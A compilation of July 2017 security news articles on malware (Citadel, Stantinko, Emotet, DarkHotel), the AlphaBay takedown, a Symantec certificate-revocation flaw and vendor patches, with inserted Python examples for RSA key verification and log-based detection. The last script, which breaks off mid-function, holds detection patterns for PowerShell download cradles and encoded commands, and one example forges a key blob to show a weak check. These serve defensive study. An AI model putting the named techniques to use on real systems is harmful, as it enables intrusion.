22.7.2017 securityweek Virus

A Russian man this week was sentenced to five years in prison for his involvement in the development and maintenance of the Citadel banking malware.

Known under the handle of “Kolypto,” Mark Vartanyan was arrested in Norway and extradited to the United States in December 2016. In March 2017, he pleaded guilty in court. Charged with one count of computer fraud, he will serve his sentence in federal prison.

The Citadel malware was designed to steal sensitive information such as online banking login credentials, courtesy of keylogging capabilities. The threat ensnared machines into botnets and affected millions of people globally. The malware was estimated in 2013 to have been responsible for over $500 million in financial fraud.

Based on the leaked source code of the Zeus banking Trojan, Citadel spawned numerous variants, the most recent of which is called Atmos and is said to be Citadel's polymorphic successor. In April last year, Atmos had over 1,000 bots.

“Citadel caused vast amounts of harm to financial institutions and individuals around the world. Mark Vartanyan utilized his technical expertise to enable Citadel into becoming one of the most pernicious malware toolkits of its time, and for that, he will serve significant time in federal prison,” U.S. Attorney John Horn said.

Also capable of stealing personally identifiable information from victim computer networks, Citadel started being sold in 2011 on invite-only, Russian-language cybercriminal forums.

Citadel operators are said to have targeted and exploited the computer networks of major financial and government institutions worldwide, including financial institutions in the United States. The malware infected an estimated 11 million computers.

According to the information presented in court, Vartanyan was involved not only in the development and maintenance of Citadel, but also in the improvement and distribution of the malware. He engaged in such activities between on or about August 21, 2012 and January 9, 2013, while residing in Ukraine, and between on or about April 9, 2014 and June 2, 2014, while residing in Norway, the Department of Justice reveals.

“Malicious software and botnets are rarely created by a single individual. Cybercrime is an organized team effort involving sophisticated, talented, and tech savvy individuals. Today's sentencing of Mr. Vartanyan […] both removes a key resource from the cyber underworld and serves as a strong deterrent to others who may be contributing to the development of botnets and malware. The threat posed by cyber criminals in the U.S. and abroad is ever increasing,” David J. LeValley, Special Agent in Charge, FBI Atlanta Field Office, said.


Symantec Tricked Into Revoking Certificates Using Fake Keys

22.7.2017 securityweek Security

Researcher Hanno Böck has tricked Symantec into revoking TLS certificates by falsely claiming that their private keys had been compromised. Comodo was also targeted, but the company did not fall for the same ruse.

Certificate authorities (CAs) are required to revoke certificates whose private keys have been compromised within 24 hours. Keys are often inadvertently exposed by certificate owners and previous research by Böck showed that while it often takes companies more than 24 hours, ultimately they do revoke compromised certificates.

Böck then decided to check if CAs ensure that an allegedly compromised private key actually belongs to a certificate before revoking it.

The researcher set up a couple of test domains and ordered free, short-term certificates for them from Comodo and Symantec’s RapidSSL. He then created fake private keys for the certificates and attempted to trick Symantec and Comodo into revoking them by providing the forged keys.

In order to increase his chances of success, Böck searched the web for private keys that were actually compromised and added them to a Pastebin post along with his forged keys. He then informed Comodo and Symantec about the “compromised” keys and asked them to revoke the certificates.

While Comodo did notice the fake keys among the ones that were actually compromised, Symantec informed him that all the certificates whose private keys were in the Pastebin post, including the fake ones apparently associated with the researcher’s test domains, had been revoked.

“No harm was done here, because the certificate was only issued for my own test domain. But I could’ve also faked private keys of other people’s certificates. Very likely Symantec would have revoked them as well, causing downtimes for those sites,” Böck explained.

The researcher was also displeased with the fact that Symantec did not provide a reason for revoking the certificates, which makes it difficult for domain owners to learn from mistakes and improve their processes. Symantec insisted that the keys associated with Böck’s certificates had been compromised, even after he pointed out that the certificates had actually been revoked based on forged keys.

“Symantec did a major blunder by revoking a certificate based on completely forged evidence. There’s hardly any excuse for this and it indicates that they operate a certificate authority without a proper understanding of the cryptographic background,” Böck said.

After the researcher made his findings public, Symantec published a blog post promising to improve its processing of third-party revocation requests.

“First, a gap was identified in the public and private key matching process where keys are verified during the revocation request procedure,” Symantec said. “We performed a modulus comparison, a necessary part of this verification process, but it was incomplete as other parameters in the keys were not checked. Once we became aware of this, we immediately corrected the procedure. We are not aware of any instances where there was customer impact as a result of this process gap other than the test scenario run by the reporting researcher.”
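The gap Symantec describes is that comparing only the modulus of a submitted private key against the certificate’s public key proves nothing: the modulus is public, so anyone can copy it into a key blob with junk private parameters. The script below is an added illustration of a complete consistency check for RSA; it is not Symantec’s or Comodo’s procedure, and it uses textbook RSA with two known Mersenne primes as constructed stand-ins for real key sizes so that it runs offline with only the standard library (Python 3.8 or later for `pow(e, -1, m)`).

```python
"""Verify that a private key submitted with a "key compromise" revocation
request really belongs to the certificate it names.

Added example; not a CA's code. P, Q and E are constructed key material.
"""
from math import gcd
import secrets

P = 2**31 - 1        # Mersenne prime M31, stands in for a real factor
Q = 2**61 - 1        # Mersenne prime M61
E = 65537


def make_keypair(p=P, q=Q, e=E):
    """Return ((n, e), (n, e, d, p, q)): the certificate's public key and
    the genuine private key behind it."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))   # ValueError if e is not invertible
    return (n, e), (n, e, d, p, q)


def forge_private_key(public):
    """Build a key blob that copies the certificate's modulus but whose d and
    factors are junk: exactly what a modulus-only comparison cannot catch.
    The bogus 'p' is a prime that does not divide n, so p * q != n."""
    n, e = public
    p_bogus = 2**19 - 1                  # Mersenne prime M19, not a factor of n
    q_bogus = n // p_bogus
    d_bogus = secrets.randbelow(n - 3) + 3
    return (n, e, d_bogus, p_bogus, q_bogus)


def modulus_only_matches(public, private):
    """The incomplete check: accepts any blob carrying the right modulus."""
    return public[0] == private[0]


def private_key_matches(public, private):
    """Complete check. Each step rejects a different class of bad submission."""
    n, e = public
    kn, ke, d, p, q = private
    if (kn, ke) != (n, e):               # 1. modulus and exponent from the cert
        return False
    if p < 2 or q < 2 or p * q != n:     # 2. claimed factors must produce n
        return False
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    if (e * d) % lam != 1:               # 3. d must invert e modulo lambda(n)
        return False
    m = secrets.randbelow(n - 2) + 2     # 4. proof of possession: a round trip
    return pow(pow(m, d, n), e, n) == m


if __name__ == "__main__":
    pub, priv = make_keypair()
    forged = forge_private_key(pub)
    print("genuine key, full check:      ", private_key_matches(pub, priv))
    print("forged key, modulus-only check:", modulus_only_matches(pub, forged))
    print("forged key, full check:       ", private_key_matches(pub, forged))
```

Step 4 is the one that matters operationally: only someone who actually holds a working private exponent can turn a random challenge value back into itself, so a revocation request should be honoured on that evidence rather than on the public modulus alone.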

“Secondly, we are reviewing how we communicate with customers during the 3rd party revocation request process to be more consistent and transparent with certificate owners,” it added.

Google and Mozilla are both displeased with Symantec, its subsidiaries and its partners regarding the improper issuance of certificates. There has been a lot of debate over the past few months about how Symantec should be penalized, with the security firm making another counterproposal this week.


Undetected For Years, Stantinko Malware Infected Half a Million Systems

22.7.2017 securityweek Virus

A massive botnet that remained under the radar for the past five years managed to infect around half a million computers and allows operators to “execute anything on the infected host,” ESET researchers warn.

Dubbed Stantinko, the botnet has powered a massive adware campaign active since 2012, mainly targeting Russia and Ukraine, but remained hidden courtesy of code encryption and the ability to rapidly adapt to avoid detection by anti-malware solutions.

Targeting users looking for pirated software, the actors behind the malware use an app called FileTour as the initial infection vector. The program installs a variety of programs on the victim’s machine, while also launching Stantinko in the background.

The massive botnet is used mainly to install browser extensions that in turn perform ad injections and click fraud, but malicious Windows services are used to execute a broad range of operations: backdoor activities, searches on Google, and brute-force attacks on Joomla and WordPress administrator panels, ESET reveals.

The threat also installs two malicious Windows services after compromise, each with the ability to reinstall the other if deleted. Because of this, successful disinfection requires both services to be deleted at the same time. If not, a new version of the deleted service could be provided by the command and control (C&C) server, researchers say.

The malicious browser extensions installed by Stantinko are called The Safe Surfing and Teddy Protection, both distributed through the Chrome Web Store and seemingly legitimate apps that block unwanted URLs. When installed by the botnet, however, the extensions receive a configuration to perform click fraud and ad injection.

Stantinko is a modular backdoor that includes a loader to execute any Windows executable sent by the C&C server directly in memory. Courtesy of a flexible plugin system, the malware’s operators can execute any code on an infected system.

Known plugins include Brute-force (performs distributed dictionary-based attacks on Joomla and WordPress administrative panels), Search Parser (performs massive distributed and anonymous searches on Google to find Joomla and WordPress websites and uses compromised Joomla websites as C&C servers), Remote Administrator (backdoor that implements a full-range of actions, from reconnaissance to data exfiltration), and Facebook Bot (performs fraud on Facebook: can create accounts, like pictures or pages, and add friends).

The malware’s operators are focused on making money mainly through click fraud. The actors are also believed to be very close to the advertisers, as users would sometimes reach the advertiser’s website directly after the Stantinko-owned ad network.

“On the other hand, traditional click-fraud malware relies on a series of redirections between several ad networks to launder their malicious traffic. This shows that not only are the Stantinko operators able to develop highly stealthy malware, but they are also able to abuse the traditional ad-serving economy without getting caught,” ESET points out.

The group behind the botnet is also trying to fraudulently access administrative accounts of Joomla and WordPress websites and resell the account logins on the underground market. Furthermore, the actors also engage in social network fraud through a plugin capable of interacting with Facebook (because of the botnet’s size, it is difficult for Facebook to detect this type of fraud).

“Even though it isn’t noticeable to the user, due to the absence of CPU intensive tasks, Stantinko is a major threat, as it provides a large source of fraudulent revenue to cybercriminals. Moreover, the presence of a fully featured backdoor allows the operators to spy on all the victimized machines,” the security researchers conclude.


Network Spreading Capabilities Added to Emotet Trojan

22.7.2017 securityweek Virus

Researchers at Fidelis Cybersecurity have spotted a variant of the Emotet Trojan that has what appears to be a feature designed to help the malware spread on internal networks.

The recent WannaCry and NotPetya incidents have demonstrated how efficient an attack can be if the malware includes a component that allows it to spread from one system to another. Given the success of these operations, other cybercriminals may also be looking to incorporate similar capabilities into their malware.

Emotet, also known as Geodo, is related to the Dridex and Feodo (Cridex, Bugat) malware families. Emotet has mainly served as a banking Trojan, helping cybercriminals steal banking credentials and other sensitive information from users in Europe and the United States.

In the attacks observed recently by Fidelis, Emotet has been used as a downloader for several other banking Trojans based on the victim’s geographical location.

The spreader component seen in attacks over the past month is designed to enumerate network resources in an effort to locate shares to which it can write a file and create a remote service. The service, named “Windows Defender System Service,” writes the malware to the disk and executes it.

If a shared resource is password-protected, the malware will try to guess credentials for user and administrator accounts by launching a dictionary attack.

Researchers pointed out that the network spreader component they have analyzed is packaged differently compared to the known Emotet modules, which could indicate that the spreader is a component used only by a specific group and not a direct piece of the malware.
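The spreader described above leaves a distinctive trace on every host it reaches: a new service, named “Windows Defender System Service”, whose binary was just written to a share. The script below is an added example of how a defender could triage service-installation events for that pattern; it is not Fidelis’ code. The records are constructed in the shape of an export of Windows System log event 7045 (Service Control Manager: a service was installed), one pipe-separated record per line; the field layout, the baseline locations for the genuine Defender binaries and the user-writable location hints are assumptions made for this example.

```python
"""Flag service-installation events that resemble the Emotet spreader's
remote service. Added example, not Fidelis' code; event records, field
layout and path heuristics are constructed assumptions."""

# Service name reported for the spreader component.
KNOWN_BAD_NAMES = {"windows defender system service"}

# Assumed locations of the legitimate Defender binaries (lower-cased).
EXPECTED_DEFENDER_DIRS = (
    "c:\\program files\\windows defender\\",
    "c:\\windows\\system32\\",
)

# Assumed hints that a service binary lives where any user could write.
WRITABLE_HINTS = ("\\users\\", "\\temp\\")

FIELDS = ("timestamp", "host", "event_id", "service_name", "image_path", "account")

# Constructed export of event 7045 (and one unrelated 7036) records.
SAMPLE_EVENTS = r"""
2017-07-19T10:02:13|WS01|7045|Windows Defender Antivirus Service|"C:\Program Files\Windows Defender\MsMpEng.exe"|LocalSystem
2017-07-19T10:05:41|WS01|7045|Windows Defender System Service|C:\Users\Public\Libraries\wdss.exe|LocalSystem
2017-07-19T10:06:02|FS02|7045|Windows Defender System Service|\\WS01\C$\Windows\Temp\wdss.exe|LocalSystem
2017-07-19T11:15:00|WS03|7045|Backup Agent|C:\Program Files\Acme\agent.exe|LocalSystem
2017-07-19T11:20:00|WS03|7036|Print Spooler|C:\Windows\System32\spoolsv.exe|LocalSystem
"""


def parse_events(text):
    """Turn the pipe-separated export into a list of record dicts,
    skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split("|")
        if len(parts) == len(FIELDS):
            records.append(dict(zip(FIELDS, parts)))
    return records


def analyze(record):
    """Return the list of reasons a service-install record looks suspicious
    (empty for events that are not 7045 or show nothing unusual)."""
    if record["event_id"] != "7045":
        return []
    name = record["service_name"].strip().lower()
    path = record["image_path"].strip().strip('"')
    low = path.lower()
    reasons = []
    if name in KNOWN_BAD_NAMES:
        reasons.append("service name matches Emotet spreader indicator")
    if "defender" in name and not low.startswith(EXPECTED_DEFENDER_DIRS):
        reasons.append("Defender-like name outside expected directories")
    if low.startswith("\\\\"):
        reasons.append("service binary on a network share (UNC path)")
    if any(hint in low for hint in WRITABLE_HINTS):
        reasons.append("service binary in a user-writable location")
    return reasons


def find_suspicious(text):
    """Return one finding per record that triggered at least one reason."""
    findings = []
    for record in parse_events(text):
        reasons = analyze(record)
        if reasons:
            findings.append({
                "host": record["host"],
                "service_name": record["service_name"],
                "image_path": record["image_path"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["host"], f["service_name"], f["image_path"])
        for r in f["reasons"]:
            print("   -", r)
```

Matching the exact service name catches the variant Fidelis observed; the path heuristics are there so that a renamed service still surfaces, since a service whose binary sits on a remote share or in a world-writable directory deserves a look regardless of what it is called.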

“With the recent addition of spreading capabilities being added to ransomware it’s not at all surprising to see other malware families start to look into adding similar capabilities. It seems to be a common trend lately for malware developers to add in functionality based on what’s in the news which recently has been filled with all things wormable, which could mean this might be a continued trend for malware in the future,” said Fidelis’ Jason Reaves.

Fidelis has published a blog post containing technical details on the spreader component and indicators of compromise (IoCs).


Hundreds of Java Flaws Patched by Schneider in Trio TView Software

22.7.2017 securityweek Vulnerability

Energy management and automation solutions giant Schneider Electric was informed by a researcher that its Trio TView software uses a version of Java that was released in 2011 and is affected by hundreds of vulnerabilities.

Researcher Karn Ganeshen informed Schneider that the version of Java Runtime Environment (JRE) used in Trio TView, a management and diagnostics software for industrial radio systems, is outdated and contains numerous vulnerabilities.

JRE 1.6.0 update 27, released in August 2011, is plagued by more than 360 flaws, including security holes that over the past years have been exploited in attacks by both cybercriminals and state-sponsored threat actors. The list includes CVE-2015-4902, CVE-2015-2590 and CVE-2012-4681, all of which were zero-day vulnerabilities at some point.

The outdated version of Java is present in TView 3.27.0 and earlier. With the release of TView 3.29.0, Schneider updated the Java component to version 1.8.0 update 131, which Oracle released in mid-April 2017.

Ganeshen previously notified Schneider of several vulnerabilities, including ones affecting some of the company’s power meters.

Vulnerabilities in Schneider Electric PowerSCADA Anywhere and Citect Anywhere

Schneider has informed ICS-CERT that it has released patches for several medium and high severity vulnerabilities impacting its PowerSCADA Anywhere and Citect Anywhere.

The vulnerable applications are extensions of Citect SCADA, a high-performance SCADA software package for industrial process customers.

Versions 1.0 of PowerSCADA Anywhere and Citect Anywhere are affected by a high severity cross-site request forgery (CSRF) flaw that can be exploited to initiate “state-changing requests” by getting the targeted user to click on a specially crafted link.

The other vulnerabilities have been described as information exposure issues, use of outdated cipher suites, and a weakness that can be exploited to escape the application and launch other processes.

Patches for these security holes are included in version 1.1 of the affected products. Schneider has also provided a series of recommendations for hardening systems running PowerSCADA Anywhere and Citect Anywhere.


Tor Launches Bug Bounty Program — Get Paid for Hacking!
21.7.2017 thehackernews Security
With the growing number of cyber attacks and breaches, a significant number of companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded.
Following major companies and organisations, the non-profit group behind Tor Project – the largest online anonymity network that allows people to hide their real identity online – has finally launched a "Bug Bounty Program."
The Tor Project announced on Thursday that it joined hands with HackerOne to start a public bug bounty program to encourage hackers and security researchers to find and privately report vulnerabilities that could compromise the anonymity network.
HackerOne is a bug bounty startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the United States Department of Defense for Hack the Pentagon initiative.
Bug bounty programs are cash rewards given by companies or organisations to white hat hackers and researchers who hunt for serious security vulnerabilities in their websites or products and then responsibly disclose them.
The Tor Project announced its intention to launch a public bug bounty program in late December 2015 during a talk by the Tor Project at Chaos Communication Congress (CCC) held in Hamburg, Germany. However, it launched the invite-only bounty program last year.
The highest payout for the flaws has been set at $4,000 — bug hunters can earn between $2,000 and $4,000 for High severity vulnerabilities, between $500 and $2,000 for Medium severity vulnerabilities, and a minimum of $100 for Low severity bugs.
Moreover, less severe issues will be rewarded with a t-shirt, stickers and a mention in Tor's hall of fame.
"Tor users around the globe, including human rights defenders, activists, lawyers, and researchers, rely on the safety and security of our software to be anonymous online," Tor browser developer Georg Koppen said in a blog post. "Help us protect them and keep them safe from surveillance, tracking, and attacks."
The Tor Project is a non-profit organisation behind the Tor anonymizing network that allows any online user to browse the Internet without the fear of being tracked.
The Project first announced its plan to launch the bug bounty program weeks after it accused the FBI of paying researchers at Carnegie Mellon University (CMU) at least $1 million to help it unmask Tor users and reveal their IP addresses, though the FBI denies the claims.


Feds Seize AlphaBay and Hansa Markets in Major Dark-Web Bust
21.7.2017 thehackernews CyberCrime
It's finally confirmed — in a coordinated international operation, Europol along with the FBI, DEA (Drug Enforcement Agency) and Dutch National Police have seized and taken down AlphaBay, one of the largest criminal marketplaces on the Dark Web.
But not just AlphaBay, the law enforcement agencies have also seized another illegal dark web market called HANSA, Europol confirmed in a press release today.
According to Europol, both underground criminal markets are "responsible for the trading of over 350,000 illicit commodities including drugs, firearms and cybercrime malware."
On July 4th, AlphaBay suddenly went down without any explanation from its administrators, which left its customers in panic. Some of them even suspected that the website's admins had pulled an exit scam and stole user funds.
However, last week it was reported that the mysterious shut down of the dark web marketplace was due to a series of raids conducted by the international authorities.
The raid also resulted in the arrest of Alexandre Cazes, a 26-year-old Canadian citizen who was one of AlphaBay's alleged operators and was awaiting extradition to the US when a guard found him hanged in his jail cell the next day.
Now, Europol has announced that two of the largest criminal Dark Web markets—AlphaBay and Hansa—have been shut down by the authorities, as infrastructure "responsible for the trading of over 350 000 illicit commodities including drugs, firearms and cybercrime malware."
"This is an outstanding success by authorities in Europe and the US. The capability of drug traffickers and other serious criminals around the world has taken a serious hit today after a highly sophisticated joint action in multiple countries," Rob Wainwright, Europol Executive Director said.
"By acting together on a global basis the law enforcement community has sent a clear message that we have the means to identify criminality and strike back, even in areas of the Dark Web. There are more of these operations to come."
Feds Covertly Monitored Activities of Criminals Hansa Market
This is what made the operation more interesting.
The federal authorities revealed that they secretly took control over the Hansa market on 20th June 2017 and kept it running for at least a month in an effort to monitor the activities of vendors and buyers without their knowledge.
And here's the Icing on the cake — During the same period federal authorities purposely only took down AlphaBay, forcing their users to join the Hansa market for illegal trading and purchasing.
"We could identify and disrupt the regular criminal activity that was happening on Hansa market but also sweep up all of those new users that were displaced from AlphaBay and looking for a new trading platform for their criminal activities," Rod Jay Rosenstein, the Deputy Attorney General for the DoJ, said today in a live press conference in Washington DC.
How One Simple Mistake Revealed AlphaBay Operator’s Identity
Cazes made the same mistake that most cyber criminals do which revealed his real identity and led to his arrest. He was using his personal email (Pimp_Alex_91@hotmail.com) to send out welcome & support emails to all members of his AlphaBay websites.
OPSEC Failure — One simple mistake revealed the identity of the AlphaBay operator and led to his arrest.
The feds learned that the email address belonged to a Canadian man named Alexandre Cazes with the birth date October 19, 1991, and was working as president of a software company called EBX Technologies.
Cazes has been charged with a total of 16 counts, including:
1 count of conspiracy to engage in racketeering
1 count of conspiracy to distribute narcotics
6 counts of distribution of narcotics
1 count of conspiracy to commit identity theft
4 counts of unlawful transfer of false identification documents
1 count of conspiracy to commit access device fraud
1 count of trafficking in device making equipment
1 count of money laundering conspiracy
"Law enforcement authorities in the United States worked with numerous foreign partners to freeze and preserve millions of dollars’ worth of cryptocurrencies that were the subject of forfeiture counts in the indictment, and that represent the proceeds of the AlphaBay organization’s illegal activities," the DoJ says.
After the disappearance of Silk Road, AlphaBay emerged in 2014 and became a leader among dark web marketplaces for selling illicit goods from drugs to stolen credit card numbers, exploits, and malware.
Prior to its takedown, AlphaBay Market reached more than 200,000 customers and 40,000 vendors, with over 250,000 listings for illegal drugs and over 100,000 stolen and fraudulent identification documents and access devices, malware and other computer hacking tools.
Authorities believe that dark web sites like AlphaBay and Hansa were responsible for the loss of many lives in America.
"Today, some of the most prolific drug suppliers use what is called the dark web, which is a collection of hidden websites that you can only access if you mask your identity and your location," Rosenstein said.
"One victim was just 18 years old when in February she overdosed on a powerful synthetic opioid which she had bought on AlphaBay. Grant Siever, only 13 years of age, a student at Treasure Mountain Junior High School, Utah, Park City. When he passed away, after overdosing on a synthetic opioid that had been purchased by a classmate on AlphaBay."
Like AlphaBay, Silk Road, the largest Dark Web market at that time, was also shut down after law enforcement raided its servers in 2013 and arrested its founder Ross William Ulbricht, who has been sentenced to life in prison.
The feds also seized Bitcoins (worth $33.6 million, at that time) from the dark web site. Those Bitcoins were later sold in a series of auctions by the United States Marshals Service (USMS).


DarkHotel APT group leverages new methods to target politicians
21.7.2017 securityaffairs APT

According to Bitdefender, DarkHotel APT is back and it is targeting government employees with an interest in North Korea with a technique dubbed Inexsmar.
According to the security firm Bitdefender, the DarkHotel APT is back and it is targeting government employees with an interest in North Korea with new techniques.

The hackers’ victims have been discovered in several countries, including North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, Taiwan, China, the United States, India, Mozambique, Indonesia and Germany.

The first Darkhotel espionage campaign was spotted by experts at Kaspersky Lab in late 2014. According to the researchers, the APT group had been around for nearly a decade, targeting selected corporate executives traveling abroad.

According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared to be highly skilled professionals who exfiltrated data of interest with surgical precision and deleted any trace of their activity. The researchers noticed that the gang never goes after the same target twice. The list of targets includes CEOs, senior vice presidents, top R&D engineers, and sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Security researchers believe the APT group members are Korean speakers.

The attackers leveraged several methods to hack into the target systems, including zero-day exploits, and used peer-to-peer (P2P) file sharing websites and hotel Wi-Fi as attack vectors.

Now the Darkhotel group is using new attack methods and an exploit leaked from the Italian surveillance firm Hacking Team.

The attack technique used in recent attacks was dubbed Inexsmar and it was observed in targeted attacks against political figures.

“Our threat researchers have come across a very particular DarkHotel attack known as Inexsmar, which appears to mark a significant departure from the APT group’s traditional modus operandi. This sample dates back to September 2016 and seems to be used in a campaign that targets political figures rather than the usual corporate research and development personnel, CEOs and other senior corporate officials.” reads the analysis published by BitDefender.

“This attack uses a new payload delivery mechanism rather than the consecrated zero-day exploitation techniques, blending social engineering with a relatively complex Trojan to infect its selected pool of victims.”

Hackers spread a Trojan downloader via phishing emails; the malicious code gathers information on the infected device and sends it back to the attackers. If the infected system meets specific requirements, a first-stage downloader disguised as a component of OpenSSL is fetched. In this phase, the malicious code opens a document titled “Pyongyang e-mail lists – September 2016,” which contains email contacts for various organizations in Pyongyang.


The attack stops if the requirements are not satisfied, otherwise, another payload is delivered.

Unfortunately, at the time of the investigation, the C&C server was offline and researchers were not able to collect further details about the attack.

The use of a multi-stage downloader is the main improvement over exploit-based delivery: each stage only runs if the previous one reports a suitable victim, which lets the attackers control distribution and update the malware without burning an exploit.


Apple Patches BroadPwn Bug in iOS 10.3.3
21.7.2017 Threatpost Apple
Apple released iOS 10.3.3 Wednesday, which serves as a cumulative update that includes patches for multiple vulnerabilities including the high-profile BroadPwn bug that allowed an attacker to seize control of a targeted iOS device.

BroadPwn was revealed earlier this month as a flaw in Broadcom Wi-Fi chipsets used in Apple and Android devices. Apple said the vulnerability affected the iPhone 5 to iPhone 7, the fourth-generation iPad and later versions, and the iPod Touch 6th generation.

Exodus Intelligence discovered the flaw (CVE-2017-3544), which was patched earlier this month on Android when Google released its July Android Security Bulletin. Nitay Artenstein, the researcher with Exodus Intelligence who discovered the vulnerability, is scheduled to do a talk on the vulnerability at Black Hat next week.

Yesterday’s Apple security updates also included fixes for its tvOS, iTunes and iCloud for Windows, the Safari browser, watchOS and macOS Sierra.

In addition to patching the BroadPwn vulnerability, Apple addressed 13 arbitrary code execution vulnerabilities, ranging from a buffer overflow bug found in the Contacts app (CVE-2017-7062) to a memory corruption issue (CVE-2017-7009) in the CoreAudio component of the OS.

The open source web browser engine WebKit was also patched by Apple. One WebKit vulnerability (CVE-2017-7011) allowed an attacker to use a malicious website that could lead to an “address bar spoofing” attack. A second (CVE-2017-7019) WebKit memory corruption issue allowed an attacker to maliciously craft web content that could lead to arbitrary code execution on a targeted iOS device.

“The issue involves the ‘WebKit Page Loading’ component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site,” wrote Apple regarding CVE-2017-7019.

On Wednesday, Apple also released patches for macOS Sierra 10.12.6, as well as Security Update 2017-003 for El Capitan and Security Update 2017-003 for Yosemite. Four CVEs were associated with a memory corruption issue tied to all macOS operating systems. The vulnerability (CVE-2017-7031) is an “issue that involves the ‘Foundation’ component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted file,” according to Apple.

Apple also released iCloud for Windows 6.2.2 that addressed almost a dozen CVEs tied to bugs found by Google Project Zero researchers. Researcher Ivan Fratric, with Google Project Zero, is behind eight of the CVEs. Most of the bugs he found are related to iCloud memory corruption issues in WebKit. The flaw allowed the processing of maliciously crafted web content within the app that could lead to arbitrary code execution.

Apple’s watchOS 3.2.3 release snuffed out a number of bugs including one interesting vulnerability tied to the operating system’s libxml2 library, responsible for manipulating XML content, that impacted all watch models. “Parsing a maliciously crafted XML document may lead to disclosure of user information,” described Apple (CVE-2017-7013).

A memory corruption bug was patched in Apple’s tvOS (CVE-2017-7008) that could lead to arbitrary code execution if a maliciously crafted movie file was played on the device, Apple said.


Defenders Gaining on Attackers, But Attacks Becoming More Destructive: Cisco

21.7.2017 securityweek Attack

Cisco Publishes 2017 Midyear Cybersecurity Report

Cisco's just-released Midyear Cybersecurity Report (PDF) draws on the accumulated work of the Cisco Security Research members. The result shows some improvement in industry's security posture, but warns about the accelerating pace of change and sophistication in the global cyber threat landscape.

Improvements can be demonstrated by the mean 'time to detect.' When monitoring first began in November 2015, this stood at 39 hours; but it narrowed to about 3.5 hours in the period from November 2016 to May 2017.

Against this, however, Cisco warns that the pace of technology is creating an ever-increasing threat surface that needs to be protected. "Lack of visibility into dynamic IT environments," notes the report, "the risks presented by "shadow IT," the constant barrage of security alerts, and the complexity of the IT security environment are just some reasons resource-strapped security teams struggle to stay on top of today's evasive and increasingly potent cyber threats."

The report analyzes existing threats, comments on evolving attack methodologies, and makes two worrying predictions about the increasing ruthlessness of attackers. The first prediction is that any apparent current lull in the use of IoT-based large-scale DDoS is no reason for optimism. "Botnet activity in the IoT space suggests some operators may be focused on laying the foundation for a wide-reaching, high-impact attack that could potentially disrupt the Internet itself," says Cisco.

Cisco's second concern is over the potential evolution of ransomware into a threat designed to lock down systems and destroy data as part of the attack process. It calls this threat, Destruction of Service (DeOS); and we may have already seen its nascence in NotPetya .

In financial value to the attacker, Cisco points out that ransomware is far less fruitful than the business email compromise (BEC) attack. "US$5.3 billion was stolen due to BEC fraud between October 2013 and December 2016. In comparison, ransomware exploits took in US$1 billion in 2016," says the report.

"BEC scams are aimed at big targets," it explains, "and big targets have fallen victim to them, even though such organizations may have mature threat defenses and safeguards against fraud. Both Facebook and Google have been victims of BECs and wire fraud." The attack's success rate is easily explained. "Because BEC messages don't contain malware or suspect links, they can usually bypass all but the most sophisticated threat defense tools."

Cisco highlights five current trends in malware evolution that have been evident in the first six months of 2017. The first is that attackers are using distribution systems that require users to take some type of positive action. An example would be a password-protected malicious document (with the password conveniently provided to the user in the body of the email). "When placed in a sandbox environment," says Cisco "these attachments do not show any evidence of being malicious, so they are forwarded to the user."

The second trend is that ransomware authors are creating malware quickly, easily, and cost-effectively by using open-source codebases, like Hidden Tear and EDA2, which publicly release ransomware code for "educational" purposes.

The third is the continuing growth of ransomware-as-a-service (RaaS) platforms, such as Satan. These, says the report, "are ideal for lazy adversaries who want to enter the ransomware market and launch a successful campaign without having to perform any coding or programming."

"Ransomware as a service," comments David Kennerley, director of threat research at Webroot, "is without a doubt one of the biggest threats facing organizations across industries today, and protection against ransomware is currently a question of economics. Due to poor security practices and culture in many cases it is often seen to be cheaper to pay the ransom to get the data back than to use internal recovery procedures."

But he does not recommend this approach. "No matter how tempting it might be, if any other option exists, however challenging, companies should never negotiate or concede to the criminal and pay the ransom. The danger with paying the ransom is there's no guarantee they'll recover the encrypted files. By paying you are only fueling the ransomware economy – and what now stops you being targeted again in future cyberattacks?"

Cisco's fourth malware trend is the growing prevalence of fileless or memory-resident malware. "It relies on PowerShell or WMI to run the malware completely in memory without writing any artifacts to the file system or registry, unless the attacker wants to put persistent mechanisms in place." Because there is no malware on the disk, there is no file to detect.
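Because the fileless pattern leaves nothing on disk, it has to be caught where the malware is launched rather than where it is stored. The following Python script is an added example (not from Cisco's report) that triages constructed process-creation records for the launch traits the report names: PowerShell invoked with an encoded or hidden-window command line, a download cradle that pulls the next stage into memory, and process creation through WMI. The record format, host names, command lines and the `example.invalid` URL are all constructed for illustration.

```python
"""Triage process-creation records for fileless PowerShell/WMI launch patterns."""
import base64
import re
from typing import Dict, List, Optional

# Office parents spawning PowerShell are the classic macro-to-memory chain.
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
WMI_RE = re.compile(r"\bwmic\s+process\s+call\s+create\b", re.I)
CRADLE_RE = re.compile(r"\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient)\b", re.I)
# Constructed record layout (hypothetical): timestamp host parent=... cmd=...
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE script text wrapped in base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
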